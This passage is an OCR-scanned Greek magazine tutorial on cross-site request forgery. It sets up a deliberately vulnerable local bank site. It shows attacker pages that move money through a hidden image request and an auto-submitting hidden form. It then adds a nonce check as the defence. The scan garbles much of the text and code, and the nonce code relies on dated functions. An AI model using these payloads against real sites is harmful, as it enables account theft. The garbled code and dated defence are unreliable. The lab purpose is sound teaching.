αν χρησιμοποιείται поло συχνὰ yia αυτό то σκοπὀ. Αυτή την апостол ἐχει η μὲ- 
θοδος POST. Πα παράδειγµα, отам συμπληρώνουμε µια φόρμα HTML και πατάμε то 
κουμπί υποβολἠς, τα δεδομένα που δώσαμε μεταφέρονται μέσω της μεθόδου POST. 
To πλεονέκτημα της μεθόδου POST ἑναντι της GET, εἶναι ὁτι τα δεδομένα που µετα- 
φέρονται δεν τοποθετούνται στο URL και δεν εἶναι ἄμεσα ората. 


Μέθοδος και προὐποθέσεις 


Н αρχικἠ περιγραφὴ και η λιγοστή θεωρία που ακολούθησε δεν αρκούν yia να Ka- 
Tavonoel камејс τι εἶναι οι επιθέσεις CSRF. Πα αυτό To λὀγο, θα περιγράψουμε το 
noc πραγματοποιείται µια τέτοια επίθεση — αναφέροντας ταυτόχρονα και τις ὀποιες 
προὐποθέσεις. 
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О χρήστης nou αποτελεί το θύμα της επίθεσης, πρέπει εἶναι συνδεδεμένος στο 
website προς το onoio θα πραγµατοποιηθεἰ η επίθεση. Πρακτικὰ, auró опџа!- 
νει OTI ἐχει κάνει login στο website και διατηρεἰ "ανοιχτή" τη σελίδα σε κάποια 
картела του browser — ñ от! έχει συνδεθεί στο παρελθὀν και тора παραμένει 
συνδεδεμένος εξαιτίας των αποθηκευμένων cookies. 


О κακὀβουλος χρήστης εξαπατά τον χρήστη-θύμα και том οδηγεἰ σε µια ειδικἠ 
σελἰδα, η οποία αποτελεἰ τµήµα του μηχανισμού επίθεσης. Η εξαπάτηση του 
θύματος πραγματοποιείται συνήθως µε τη βοήθεια Tou social engineering ἡ 
µε κάποια μέθοδο phishing. Πα παράδειγµα, ο επιτιθέμενος unopsi να στείλει 
στο θύμα Eva κατάλληλα γραμμένο και σχεδιασμένο email, το onoio θα μοιάζει 
να προέἐρχεται апо то Facebook ἡ κάποια άλλη γνωστὴ υπηρεσία. Σε аџто то 
email, φυσικἀ, δεν θα υπάρχουν σύνδεσμοι (links) προς το αληθινό Facebook. 
Θα υπάρχουν links µόνο yia τη σελἰδα-παγίδα, στην οποία πρέπει να μεταβεί 
το θύμα. 


Н σελἰδα που ἐχει κατασκευάσει o επιτιθέμενος περιέχει στον KWOIKA της Al- 
τήματα GET ἡ POST, προς ro website στο οποίο εἶναι συνδεδεμένο TO θύμα. 
Έτσι, όταν το θύμα Φτάνει στη семда του επιτιθέµενου, ο browser διαβάζει 
τον κὠδικα HTML, συναντά τα εν λόγω αιτήματα και τα εκτελεί! 


[7] localhost/ionbank/index; х 


e - 


С | D localhost/ionbank/index.php 
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Username: george 


Password: 


Login 


To website της τράπεζας εἶναι εξαιρετικά απλὀ. Όταν то ENI- 
OKENTOUGOTE, συναντάμε μόνο τη φόρμα σύνδεσης. 


Πλαστογραφημένες δικτυακές αιτήσεις 
κά“. 


Τα αιτήματα που περιεἰχε η σελἰδα rou επιτιθέµενου και τα οποία εκτελεἰ о browser 
του θύματος, μπορούν να αντλήσουν οποιαδήποτε πληροφορία rj και να прауџа- 
τοποιήσουν οποιαδήποτε ενέργεια (π.χ., να αλλάξουν το συνθηματικὀ του χρήστη, 
να τροποποιήσουν κάποια ἄλλη ρύθμιση, να διαγράψουν το Лоүартасно к.о.к.). Δεν 
EXE] каша σημασία αν πρὀκειται για δεδομένα ἡ ενέργειες που απαιτούν τη σύνδεση 
(login) του χρήστη, εφόσον τα αιτήματα φαίνεται να προέρχονται апо том browser 
емос συνδεδεμένου χρήστη. Av το website που γίνεται αποδέκτης των πλαστῶν 
αιτημάτων δεν npayparonoigi τον κατάλληλο ἐλεγχο εγκυρότητας, θα τα εκτελέσει 
κανονικὰ! 


Ano τη θεωρία στην πράξη 


Н παραπάνω περιγραφὴ εἶναι πολύ πιο κατατοπιστικἠ апо ова εἰπαμε προηγου- 
μένως. Ὅμως, п αλήθεια εἶναι ὁτι δεν σταθἠκαµε σε каша λεπτομέρεια και, τέλος 
πάντων, δεν ξεφύγαμε апо τη θεωρία. Στη συνέχεια, λοιπὸν, θα εξετάσουμε ша 
επίθεση CSRF στην πράξη, κατασκευάζοντας το website που θα дехте! την επίθεση 
καθὼς και την ειδικἠ σελίδα του επιτιθέµενου, αυτή, µε та πλαστά αιτήματα. Па 
την κατασκευὴ όλων αυτών θα στηριχτούµε στον Apache web server και στη βάση 
δεδομένων MySQL. Συγκεκριμένα, θα χρησιμοποιήσουμε το πακέτο WAMP, που προ- 
σθέτει ra δύο παραπάνω προγράμματα μαζί µε τον διερμηνέα (interpreter) της РНР 
και διάφορα βοηθητικἁ εργαλεία ὅπως To phpMyAdmin (www.wampserver.com/en). 


[5 localhost/ionbank/index.; х 


€ 6 | D localhost/ionbank/index.php 


Sender: 111000 
Remaining funds: 1200.33 


Transfer amount: 
Transfer to: 


Transfer amount 


Logout 


Мета τη σύνδεση aro τραπεζικὀ website, εµφανίζεται η 
φόρμα μεταφοράς χρημάτων. Н ἰδια σελίδα εμφανίζει και 
το διαθέσιμο υπόλοιπο του λογαριασμού µας. 
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Στο σενἀριὀ µας θα παΐξουμε το POAO ενὸς κακὀβουλου χάκερ, ο οποίος прауџато- 
ποιεἰ επιθέσεις CSRF εναντίον του website µιας μεγάλης και γνωστής τράπεζας: της 
IonBank ;) Το website της τράπεζας περιλαμβάνει µια βάση δεδομένων µε τους пела- 
τες. Па να µην πλατιάζουμε аскопа, θα υποθέσουμε Ori αυτή η βάση εἶναι εξαιρετικἁ 
апл και για κάθε πελάτη длатпре! μόνο τα ακόλουθα στοιχεία: Έναν κωδικὀ πελάτη, 
ἑνα username, ἑνα password kai το σύνολο των χρημάτων. Όταν ἑνας πελάτης ка- 
νει login στη σελἰδα της τράπεζας, апокта πρὀσβαση σε ша φόρμα μεταφορὰς χρη- 
μάτων. Аот η φόρμα περιλαμβάνει Eva πεδίο yia τη συμπλήρωση rou χρηματικού 
ποσού που θα μεταφερθεί κι Eva πεδίο για τον κωδικὀ πελάτη nou θα παραλάβει та 
χρήματα. Με την υποβολή της φόρμας, то ποσὀ που ὀρισε ο χρήστης αφαιρείται ano 
τον λογαριασμὀ του και μεταφέρεται στον λογαριασμό του παραλήπτη. О κακόβου- 
λος χάκερ της ιστορίας (δηλαδἠ εμείς ;) θα πραγματοποιήσει µια επίθεση CSRF για 
να κλέψει χρήματα апо ro θύμα, αξιοποιώντας αυτήν ακριβώς тп φόρμα. Н kAonr| θα 
συντελεστεἰ αυτόματα, µέσω κάποιων αιτημάτων nou θα πραγματοποιήσει το θύμα 
*xopic* να αντιληφθεί το парашкро. 


Το τραπεζικὀ website 


Όπως αντιλαμβάνεστε, θα σας δώσουμε ола ra αρχεία που απαιτούνται για τη δη- 
μιουργἰα του τραπεζικού website και της σελἰδας rou επιτιθἐµενου. Па την a&ionoi- 
non τους, ὁμως, θα χρειαστεί να κατεβάσετε kai να εγκαταστήσετε το πακέτο που 
αναφέραμε προηγουμένως (WAMP). Αφού ξεμπερδέψετε µε την εγκατάσταση και 
ξεκινήσετε το WAMP, θα εμφανιστεί ема σχετικὀ εικονίδιο στο system tray. 


Тора μπορούμε να ξεκινήσουμε το στήσιμο του τραπεζικού website. Па αρχή, θα 
κατασκευάσουμε τη βάση δεδομένων µε τους πελάτες. Αυτή η δουλειά θα γίνει µε 
τη βοήθεια του εργαλείου phpMyAdmin, που διευκολύνει τη δηµιουργία και τη δια- 
χείριση βάσεων της MySQL. Πα την εκκἰνηση του εργαλεἰου αρκεἰ να κάνουμε κλικ 
στο εικονίδιο του WAMP και να επιλέξουμε το... phpMyAdmin! Па τη σύνδεση στο 
περιβάλλον του προγράμματος οφείλουμε να δώσουμε σαν username το root ка! 
να αφήσουμε то πεδίο του password κενὸ. Στη συνέχεια, πρέπει να επισκεφτούμε 
την картела "Κώδικας SQL" και στο μεγάλο text box που θα δούμε ма εισάγουμε та 
ακόλουθα: 


CREATE DATABASE  1опбапк ; 
USE "ionbank ; 


CREATE TABLE IF NOT EXISTS “users ( 
"а" int(11) NOT NULL AUTO INCREMENT, 
"customer code' bigint(20) NOT NULL, 
"username! varchar(6@) NOT NULL, 
"password! char(40) NOT NULL, 
^amount' float NOT NULL, 

PRIMARY KEY (^id ), 
UNIQUE KEY (customer «οάε ) 

) AUTO INCREMENT-7; 
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INSERT INTO "users? (184, "customer code', `иѕегпате`, ~ password, 
"amount' ) VALUES 


(1, 111000, 'george', '57b2ad990444d337197c0c39fd3823568ff81e48a', 
1200.33), 


(2, 111001, 'john', '7c4a8d09ca3762af61e59520943dc26494f8941b', 2330.45), 


(3, 111002, 'papadopoulos', 'd72bfe92cf0ec06a4fad6db8d339d6c75eflef00', 
21220.4), 


(4, 111003, 'maria', '51abb9636078defbf888d8457a7c76f85c8f114c', 990.35), 


(5, 111004, 'stelios', 'c19d95ea822d83b01cdfbi1ce20abcfda77d65d42', 
8734.45), 


(6, 111999, 'hacker', '4dcc4173d8032817206e196a38f0dbf7850188ff', 120.5); 


Αμέσως µετά, apkei va πατήσουμε ro κουμπί "Εκτέλεση". Ακόμα κι αν δεν ЕХЕТЕ 
каша απολύτως ιδέα γύρω апо τη γλὠσσα SQL, αν μελετήσετε λίγο rov κὠδικα θα 
καταλάβετε αμέσως τι κάνει: Δημιουργεί µια βάση µε то омоџа ionbank και μέσα σ' 
αυτή προσθέτει ¿vav nivaka µε то ὀνομα users. Σε αυτόν τον пмака καταχωρούνται 
ἐξι χρήστες, pači µε τα στοιχεία nou амафераџе νωρίτερα (αναγνωριστικὀ, κωδικὸς, 
username, password και χρηματικὀ ποσὀ). Όπως βλέπετε, ο τελευταῖος χρήστης 
έχει το (καθόλου εμπνευσμένο) ὀνομα hacker. Πρόκειται για τον λογαριασμό που 
έχει ανοίξει o επιτιθέµενος στο website της τράπεζας και στον οποίο θα џгтаферо- 
ута! αργότερα τα κλοπιμαία. 


Мета апо τα παραπάνω, η βάση δεδομένων για то website της τράπεζας εἶναι ἑτοιμη. 
Αυτό που χρειαζόμαστε тора εἰναι το ἴδιο то website. Μπορείτε να κατεβάσετε та 
αρχεία nou το απαρτίζουν ano το http://bit.ly/dh027ionbankvuln. Αποσυμπιέζοντας 
το συγκεκριμένο πακέτο ДР θα πάρετε ἑναν κατάλογο µε TO ὀνομα ionbank. Оло- 
κληρος αυτός ο κατάλογος πρέπει va τοποθετηθεἰ στο λεγόμενο Document Root Tou 
web server. Мета ano αυτή την αντιγραφή, το website της τράπεζας Ionbank θα 
εἶναι ἑτοιμο και πλήρως λειτουργικὀ! Па ма To δείτε αρκεἰ να ανοίξετε емам browser 
και να μεταβείτε στη διεύθυνση http://localhost/ionbank. Όπως αντιλαμβάνεστε, 
η αναλυτική περιγραφὴ της κατασκευἠς емос website ξεφεύγει ano το θέµα µας. 
Ωστόσο, για va διευκολύνουμε τη μελέτη σας, θα πούμε δυο λόγια για ra αρχεία που 
απαρτίζουν το website της τράπεζας Ionbank. 


[7 localhost/ionbank/index.;- xj ΓῚ CSRF page by Ion :) 
e Ω | D localhost/csrf1.html vil xX = 


woot! What a cool page! Don't forget to visit deltaHacker.gr :) 


WVHA(OKER 


Н φαινοµενικἀ αθώα σελίδα rou κακόβουλου χάκερ. О κὠδι- 
кас̧ της περιλαμβάνει Eva ὑπουλο αἰτημα προς ro website της 
τράπεζας. Έτσι, αν εἰμαστε NON συνδεδεμένοι σε AUTO, Eva 
µέρος των χρημάτων µας Ва βγάλει φτερά και θα μεταφερθεί 
στο λογαριασμό rou επιτιθἐµενου! 
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e config.php. Περιέχει ra απαραίτητα otolxeia yia τη σύνδεση στη βάση δεδο- 
μένων MySQL, ὀπου βρίσκονται αποθηκευμένα ra δεδομένα των πελατών. Σε 
аџто το архејо ορἰζεται και η μεταβλητή MYSQL. PASS, στην οποία πρέπει va 
δώσετε τον κωδικό του χρήστη root (της MySQL). 

e functions.php. Σε αυτό το αρχείο περιέχεται o κὠδικας για διάφορες βο- 
ηθητικὲς συναρτήσεις, που χρησιμοποιούνται апо τον υπόλοιπο κὠδικα TOU 
website. Πα παράδειγµα, θα δείτε τη συνάρτηση που τυπώνει τη φόρμα σύνδε- 
σης (login), τη φόρμα μεταφοράς χρημάτων κ.λπ. 

e index.php. Πρόκειται yia την κύρια σελἰδα Tou website. О κὠδικας εἶναι ελά- 
Χιστος και πολύ απλὸς, γιατὶ το website που κατασκευάσαμµε εκτελεἰ ελάχιστες 
λειτουργἰες κι απλὲς λειτουργίες. 

e login.php. Σε auth τη σελίδα φτάνουν τα δεδοµένα που υποβάλλουμε στη 
φόρμα σύνδεσης. О κὠδικας ελέγχει ам τα εισερχόμενα δεδομένα αντιστοι- 
χοῦν σε κἄποιον χρήστη της βάσης δεδομένων του website κι αποφασίζει то 
αν θα επιτραπεἰ η σύνδεση ἡ ὀχι. 

e transfer.php. Αυτή η σελἰδα χειρίζεται τα δεδοµένα που παρέχει ο χρήστης 
στη φόρμα μεταφορὰς χρημάτων. 

e logout.php. Μια εξίσου απλἠ семда, апо опоо πραγματοποιείται η αποσύνδε- 
ση του χρήστη апо το website. 

Πριν προχωρήσουμε οφείλουμε να σταθούμε σε ша σημαντικἠ λεπτομέρεια: Τα ðe- 
δομένα nou εισάγουµε στη φόρμα μεταφορὰς χρημάτων καταλήγουν στη семда 
transfer.php, µε τη џедодо GET. Αυτό φαίνεται και στο αρχείο functions.php, ὅπου 
κατασκευάζεται η φόρμα. Н γραμμή 33 δηλώνει Ori τα δεδομένα αποστέλλονται στη 
σελίδα transfer.php κι ότι η µἐθοδος μεταφορὰς εἶναι η GET: 


<form name="transfer_form" method="get" action-"transfer.php"» 


AUTO σηµαίνει πως ὅταν ο χρήστης πατάει ro kouuni υποβολἠς της φόρμας, та προς 
μετάδοση δεδοµένα τοποθετούνται στο URL. Έτσι, επειδὴ η συγκεκριμένη φόρμα 
ζητάει το χρηματικὀ NOOO που θα µεταφερθεἰ και τον αναγνωριστικὀ κωδικὀ του 
παραλήπτη, ro URL που σχηματίζεται έχει την ακόλουθη µορφή: 


http: //localhost/ionbank/transfer. php? amount=XxXxX&recipient=YYY 


Н σελἰδα - παγίδα 


AUTO που χρειαζόμαστε тора, για να προχωρήσουμε στην пєраратікй μελέτη των 
επιθέσεων СВЕ, εἶναι η κακόβουλη σελἰδα. Μπορεῖτε να κατεβάσετε µια πρώτη 
εκδοχἠ αυτής της σελίδας ano το http://bit.ly/dhe27csrfi. Στο πακέτο θα βρείτε 
μόνο µια εικὀνα και ша απλἠ σελἰδα HTML. Αυτά τα αρχεία πρέπει να τοποθετηθούν 
σε ἑναν VEO κατάλογο емтос του Document Root ἡ και "χύμα". Ας ρίξουμε µια ματιὰ 
στον κὠδικα της κακόβουλης σελἰδας: 
«html xmlns-"http://www.w3.0rg/1999/xhtml"» 
«head» 
«title»CSRF page by Ion :)«/title» 
«/head» 
«body» 
«p»Weet! What a cool page! Don't forget to visit deltaHacker.gr :)</p> 
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«a href="http://deltahacker.gr"><img src="deltahacker.jpg"/></a> 


<img src="http://localhost/ionbank/transfer. 

php ?amount=100&recipient=111999" width="1px" height="1px"/> 

</body> 

</html> 
Όλη n βρώμικη боола yiveTal µέσα στη δεύτερη ετικέτα (й tag αν προτιμάτε) 
<img>. То прото tag αυτού rou εἶδους φορτώνει την εικὀνα που συνοδεύει τη OE- 
мада και την τοποθετεἰ μέσα σε ша ετικέτα <a>. Με αυτόν τον τρόπο δημιουργείται 
ἑνας σύνδεσμος προς τη σελἰδα του περιοδικού deltaHacker. Μέχρι Edw кала. Δεν 
συμβαίνει τίποτα πονηρὀ. Όμως, η δεύτερη ετικέτα <img> προσπαθεἰ να φορτώσει 
κάτι που δεν εἶναι εικόνα: 


src="http://localhost/ionbank/transfer. php? amount=100&recipient=111999" 


Αντἰ για To URL гмос αρχείου εικόνας, συναντάμε ro URL προς τη семда transfer. 
php, Tou website της τράπεζας! Μάλιστα, ro URL περιλαμβάνει και τις δύο απαι- 
τούμενες παραμέτρους, ὥστε να μεταφερθούν χρήματα στο λογαριασμὀ µε κωδικό 
"111999", AvapWTIEOTE σε ποιον ανήκει аџтос ο λογαριασμός; Μα, φυσικὰ, στον 
πελάτη ονόματι hacker ;) 


Δοκιμή 


Тора nou στήσαμε олп την υποδομή του πειράματος, μπορούμε να προχωρήσουμε 
στις δοκιμές. Αν η σελἰδα της τράπεζας δεν τσεκάρει την προέλευση των εισερχὀµε- 
νων αιτημάτων, οι πελάτες της κινδυνεύουν. Ας υποθέσουμε от! о κακόβουλος χάκερ 
καταφέρνει µε κάποιο τρόπο να τραβήξει ¿vav πελάτη της τράπεζας στη σελἰδα του. 
Αν аџтос ο πελάτης δεν εἶναι συνδεδεμένος στο website της τρἀπεζας, δεν θα oup- 
Bei απολύτως τίποτα. Πα του λόγου το αληθές, џпорејте να φορτώσετε τη σελἰδα 
http://localhost/csrfi.html και στη συνέχεια va τσεκάρετε τη βάση δεδομένων της 
τράπεζας, μέσα апо το εργαλεἰο phpMyAdmin. Όπως θα διαπιστώσετε, δεν θα πραγ- 
µατοποιηθεἰ каша аллЛаү στις καταθέσεις των χρηστών. Αν ὁμως то θύμα εἶχε ouv- 
деде! στο website της τράπεζας, η επἰσκειμη στην κακόβουλη семда θα Tou OTOIXIZE 
100 ευρώ! Па ма δείτε την κλοπή στην πράξη, συνδεθείτε στο website της τράπε- 
ζας (http://localhost/ionbank/index.php) µε username то george και password το 
p@sswOrd. Μόλις συνδεθείτε, θα Seite OT! το υπόλοιπο του λογαριασμού του χρήστη 
George ανέρχεται στα 1200,33 ευρὠ. Επισκεφθείτε тора την κακόβουλη σελἰδα. 
Ката την επίσκεψη δεν θα δείτε τίποτα ανησυχητικὀ στην οθὀνη. Н клеула όμως 
θα ἐχει πραγµατοποιηθεἰ! Αν επιστρέψετε στο tab µε ro website της τράπεζας και 
κάνετε µια ανανέωση, θα δείτε ὁτι το υπόλοιπο του λογαριασμού EXE! µειωθεἰ στα 
1100,33 ευρῶ. 


Εναλλακτική επίθεση 


Н επἰθεση nou µελετήσαμε λειτούργησε афоџа. Τι θα γινόταν ὁμως ам ro website 
της τράπεζας λειτουργούσε λἰγο διαφορετικά; Αν η φόρμα μεταφορὰς χρημάτων 
χρησιμοποιούσε τη μέθοδο POST, η κακόβουλη σελἰδα που εξετάσαµε δεν θα ката- 
φερνε απολύτως τίποτα. AUTO όµως δεν σημαίνει ότι θα ἦταν αδύνατη µια επίθεση 
CSRF! Κατ' αρχάς, αν το website της τράπεζας χρησιμοποιούσε τη μέθοδο POST, η 
γραμμή 33 του αρχείου functions.php θα ἦταν κάπως £rot: 


«form name="transfer_form" method="post" action="transfer.php"> 
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Παρατηρείστε ra χρηματικά 
пода των πελατών george 

Και hacker. Η περιουσία του 
hacker αναμένεται να αυξηθεἰ, 
µετά ano μία αντίστοιχη μείω- 
ση της περιουσίας Tou george! 


ids, localhost / localhost / ion. х 
€ > Ο [D localhosuphpmyadmin/sql.php?db-ionbank&table -users&server- 1&target- &token - 388 
IB ionbank > FB users 


©) Browse И Structure |] SQL κ Search 3 Insert [sb Export $=} Import g? Operations У More 


Show: Start row: |0 Numberofrows: [30  |Headersevey |100 | rows 


Sort by key: | None Σ 


+ Options 

eT У id customer code username password amount 

5 ғай Fe Сору Q Delete 1 111000 | george 57b2ad990440337197c0c39fd3823568ff81e48a | 1200.33 

LJ gf Edit ψὲ Copy & Delete 111001 john 7c4a8d09ca3762af61e59520943dc2649418941b | 2330.45 

О 2 Edit E Copy Ө Delete 111002 | papadopoulos | d72bfe92cf0ec06a4fad6db8d339d6c75eflef00 | 212204 

O ώ Edit E: Сору @ Delete 111003 maria 51abb9636078defbf888d8457a7c76f85c81114c 990.35 

О εαν Φε Сору @ Delete 111004 | stelios c19d95ea822d83b01cdfblce20abcfda77d65d42 | 8734.45 

О g?tdit x Copy @ Delete 111999 hacker 4dcc4173d80a2817206e196a38f0dbf7850188Ff 120.5 4— 


id © Check All With selected: gf Change @ Delete (4) Export 


Show: Start row: [0 Number of rows: | 30 | Headers every | 100 rows 


d localhost / localhost / ion x 

€ > C Г localhost/phpmyadmin/sql.php2db=ionbank&table=users&server=1&target=&token=388 
=| С осатћог > IB ionbank = [f users 

1] Browse i Structure || SQL à Search 8 Insert [ud Export Б) Import g Operations У More 


Show : Start row: |0 Number of rows: | 30 | Headers every | |100 — | rows 
Sort by key: | None xj 
* Options 
-Τ: V id customer code username password amount 
Мета την επίσκεψη στην Ө ται E Copy Q Delete 1 111000 | george 57b2ad99044d337197c0c39fd3823568ff81e48a | 1100.33 “Φ---- 


как Ó В ‘OU. А η σε А i δι a —ка! О «ғай Zë Copy Ө Delete 111001 john 7c4a8d09ca3762af61e59520943dc2649418941b — 233045 
χωρίς να εμφανιστεί τίποτα 5 gftdit зе Сору Ө Delete 111002 | papadopoulos | d72bfe92cfüec06a4fad6db8d339d6c75eflef00 212204 
ῃ П ῃ О g Edit E Copy @ Delete 111003 maria 51abb9636078defbf88888457a7c76f85c8f114c. 990.35 
TO аупоих Пико» ενα μερος B Еа же Copy Ө Delete 111004 | stelios c19d95ea822d83b01cdfblce20abcfda77d65d42 8734.45 
των ΧΡ Ἠματων του George H E- О g Edit 3€ Сору © Delete 111999 hacker 4dcc4173d80a2817206e196a38f0dbf7850188ff 2205 «= 
тафербпкам στο λογαριασμό 


του hacker. Н κλοπή επιβε- t_ Ὁ cheka With selected: gf Change @ Delete — (13 Export 
βαιώνεται κι ano Ta στοιχεία 
της βάσης δεδομένων της 
τράπεζας. 


Show : Start row: [o Number of rows: | 30 | Headers every | 100 | rows 


Σας προτείνουμε va κάνετε αυτή την αλλαγή, για να μπορέσετε OTN συνέχεια va 
πραγµατοποιήσετε µια ved δοκιµἠ της επίθεσης. Στην περίπτωση που εξετάζουμε, 
о κακόβουλος χάκερ θα έπρεπε να κατασκευάσει µια εντελώς διαφορετικἠ σελἰδα. 
Εσείς, µπορείτε va την κατεβάσετε апо ro http://bit.ly/dh027csrf2 και να την TONO- 
θετήσετε пал: στο Document Root Tou web server. Ας δούμε ὁμως noc λειτουργεἰ 
αυτή η σελἰδα. Όπως ἐχουμε πει, η μέθοδος POST δεν μεταφέρει τα δεδοµένα µέσα 
στο URL. Επομένως, η λύση δεν βρίσκεται στη σύνθεση ενὸς νέου URL. Αυτή τη 
фора, ο επιτιθέμενος πρέπει να τοποθετήσει στη σελἰδα του ша ολόκληρη φόρμα, 
µε τα ἰδια ακριβώς στοιχεία που περιλαμβάνει η φόρμα στο website της τράπεζας. 
Αυτἠ η φόρμα θα εἰναι εξ ορισμού συμπληρωμένη µε τις κατάλληλες τιμὲς και φυ- 
ока δεν θα εμφανίζεται ποτὲ στον επισκέπτη (θα εἶναι κρυφὴ). Προσέξτε тора το 
ακόλουθο απόσπασμα апо την ανανεωμένη κακόβουλη σελίδα: 


<form name="steal_money_form" method="post" action="http://localhost/ 
ionbank/transfer.php"» 


Πρόκειται yia την πρώτη γραμμὴ της κρυφἠς φόρμας. Ως μέθοδος αποστολἠς EXE! 
επιλεχθεί η POST, ενώ ката την υποβολή της φόρμας τα δεδομένα αποστέλλονται 
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στη σελἰδα transfer.php της трапебас! Επομένως, yia va πετύχει το σκοπὀ της η 
κακόβουλη σελἰδα, αρκεἰ ма πατηθεἰ το κουμπί υποβολἠς της κρυφἠς φόρμας. Όπως 
αντιλαμβάνεστε, ο επιτιθέμενος ἐχει φροντίσει *kal* yi! αυτό. Αν μελετήσετε τον 
κὠδικα της νέας κακὀβουλης σελίδας, θα παρατηρήσετε оп το κυρίως μέρος της 
σελἰδας (body) ξεκινά ως εξἠς: 


«body onload="document.forms[ 'steal_money_form'].submit()"> 


Σε αυτή την EKOOXN της κακόβουλης σελίδας, ο eniri8£uevoc χρησιμοποιεί και λίγη 
JavaScript. Συγκεκριµένα, χρησιμοποιεί το γεγονὸς (event) onload, ὥστε μόλις фор- 
тобде! η σελἰδα να πραγματοποιήσει αυτόματα µια ενέργεια. Н ενέργεια που праүра- 
τοποιεἰται αυτόματα εἶναι η υποβολή (submit) της φόρμας steal. money. form. Про- 
κειτα! για την κρυφὴ φόρμα που περιγράψαμε νωρίτερα και η υποβολἠ της οποίας 
πραγματοποιεί την κλοπή! 


Αν κάνετε µια бокі µε τη νέα κακόβουλη σελἰδα, θα διαπιστώσετε от: η κλοπή yi- 
νεται κανονικἀ. AUTH τη фора, όμως, η UNOUAN δράση της κακὀβουλης σελίδας ano- 
καλύπτεται. Μόλις φορτωθεί και υποβληθεἰ η κρυφἠ φόρμα (αυτή yia τη μεταφορὰ 
των χρημάτων), ο browser θα κατευθυνθεἰ (redirect) προς To website της τράπεζας. 
Αυτὀ εἶναι σίγουρο ori θα ανησυχούσε ακόµα και том πιο καλὀπιστο και ανυποψίαστο 
χρήστη. Ωστόσο, η κλοπή θα εἶχε πραγµατοποιηθεἰ. 


Άμυνα για та websites 


Н τεχνική µε την опоја μπορούμε va προστατεύσουµε Eva website ano τις επιθέἑ- 
σεις CSRF προβλέπει τη χρήση µιας πρόσθετης παραμέτρου. Μαζὶ µε τα υπόλοιπα 
στοιχεία της εκάστοτε φόρμας στέλνουμε κι ἑνα στοιχείο που ονομάζεται попсе 
(σύντμηση της φράσης "number used only once"). Πρόκειται για Eva αλφαριθµητικὀ 
που παράγεται τυχαία kai το οποίο αποθηκεύεται στην τρέχουσα συνεδρία (session) 
του χρήστη µε το website. Όταν υποβάλλεται ша φόρμα, о κὠδικας του website 
περιμένει το στοιχείο попсе και φυσικὰ ελέγχει αν η τιμή του ταιριάζει µε αυτήν που 
EXE] αποθηκευτεἰ στο session του συνδεμένου χρήστη. Αν εἶναι όλα кала, το αἰτημα 
γίνεται αποδεκτὀ. Σε διαφορετικἠ περίπτωση, o κὠδικας rou website θεωρεἰ ότι то 
αἴτημα προέρχεται апо µη αξιόπιστη nnyr kai το ayvosi! 


Ας δούµε noc μπορούμε να υλοποιήσουμε £vav τέτοιο μηχανισμὀ άμυνας. да εργα- 
στούµε στο website της τράπεζας και συγκεκριµένα στο αρχείο functions.php. Kar' 
αρχάς, θα χρειαστούμε ша συνάρτηση που θα παράγει το στοιχείο nonce: 


function addNonce($salt_size) 


{ 
if(isset($ SESSION[ 'попсе' ])) 
{ 
$nonce = $_SESSION['nonce']; 
} 
else 
{ 
$nonce = md5(mcrypt_create_iv($salt_size, MCRYPT DEV 
URANDOM) ) ; 


$ SESSION['nonce'] = $nonce; 
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} 


return $nonce; 


} 

Па rnv υλοποίηση αυτή της συνάρτησης Χρησιμοποιούμε ша ἄλλη συνάρτηση 
(mcrypt create iv), η οποία ανήκει στη βιβλιοθήκη mcrypt και παράγει τυχαίους 
κωδικούς. О κωδικὸς που παράγεται αποθηκεύεται ai µε τα υπόλοιπα δεδομένα 
TOU session. Παρεμπιπτόντως, τα δεδοµένα Tou session φυλάσσονται πάντα σε vav 
nivaka µε το ὀνομα $_SESSION. Έχοντας ετοιμάσει τη συνάρτηση παραγωγἠς του 
nonce, πρέπει να εξασφαλἰσουµε OT! θα εκτελείται αυτόματα кадг фора nou Ka- 
τασκευάζεται η φόρμα μεταφορὰς χρημάτων. AUTO γίνεται εὐκολα, προσθέτοντας 
στον κὠδικα της φόρμας την ακόλουθη γραμμὴ: 


<input type="hidden" name="nonce" valuez"'.addNonce(10).'"/» 


Н παραπάνω γραμμὴ εισάγει Eva νέο στοιχείο στη φόρμα. То ὀνομα TOU στοιχείου 
εἶναι nonce και για την τιμὴ του каліта! η συνάρτηση adNonce. Μέχρι στιγμῆς, то 
ανανεωμένο website της τράπεζας παράγει αυτόματα Eva στοιχείο попсе ка! TO TO- 
ποθετεἰ στη φόρμα μεταφοράς χρημάτων. Επομένως, πρέπει να φτιάξουμε και TOV 
μηχανισμὸ nou θα ελέγχει για την ὑπαρξη rou nonce. Αυτός o μηχανισμὸς θα Tono- 
θετηθεἰ σε ша νέα συνάρτηση, στο αρχεἰο functions.php: 


function checkNonce() 


{ 
$nonce = getParameter('nonce'); 
if(isset($ SESSION['nonce']) && $ SESSION[ 'попсе'] == $nonce) 
return TRUE; 
return FALSE; 
} 


H παραπάνω συνάρτηση ελέγχει αν η παράμετρος попсе που μεταδόθηκε µε ra δε- 
δομένα µιας φόρμας (getParameter('nonce')) ταυτίζεται µε την τιµή попсе nou ἐχει 
αποθηκευτεί στην τρέχουσα συνεδρία (5 SESSION['nonce']). Έχοντας ετοιμάσει κι 
αυτή τη συνάρτηση, απομένει η a&ionoinor| της. Όπως καταλαβαίνετε, ο ἐλεγχος για 
την ὑπαρξη алла και την τιμή του попсе πρέπει να πραγματοποιείται κάθε фора που 
υποβάλλεται η φόρμα μεταφορὰς χρημάτων. Επομένως, η παραπάνω συνάρτηση 
Πρέπει να καλείται κάθε фора nou φορτώνεται η семда transfer.php. Έτσι, στον 
κώδικα αυτἠς της σελίδας και συγκεκριµένα στη γραμμὴ ónou γίνεται ἐλεγχος για то 
αν έχει συνδεθεί ο χρήστης, θα πρέπει να καλεἰται και η συνάρτηση checkNonce. Н 
σχετικἠ γραμμή θα πρέπει να γίνει κάπως &т01: 


if(!checkLogin() || !checkNonce()) 


Μετὰ ki апо αυτή την επἐμβαση, то τραπεζικὀ website θα εἶναι аофалес απέναντι 
στις επιθέσεις CSRF! 


Αν θέλετε να αποφύγετε τη χειροκίνητη προσθήκη των παραπάνω βελτιώσεων, uno- 
peite να κατεβάσετε την ενισχυµένη/ασφαλἠ εκδοχἠ του τραπεζικού website апо 
το http://bit.ly/dh027ionbanksec. Αφού αποσυμπιέσετε το πακέτο, αντιγράψτε том 
κατάλογο ionbank στο Document Root, "πάνω" ano την пама екдохп Tou website. 
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Τώρα, µπορείτε va συνδεθεῖτε στο ανανεωμένο website και va δοκιμάσετε την Eni- 
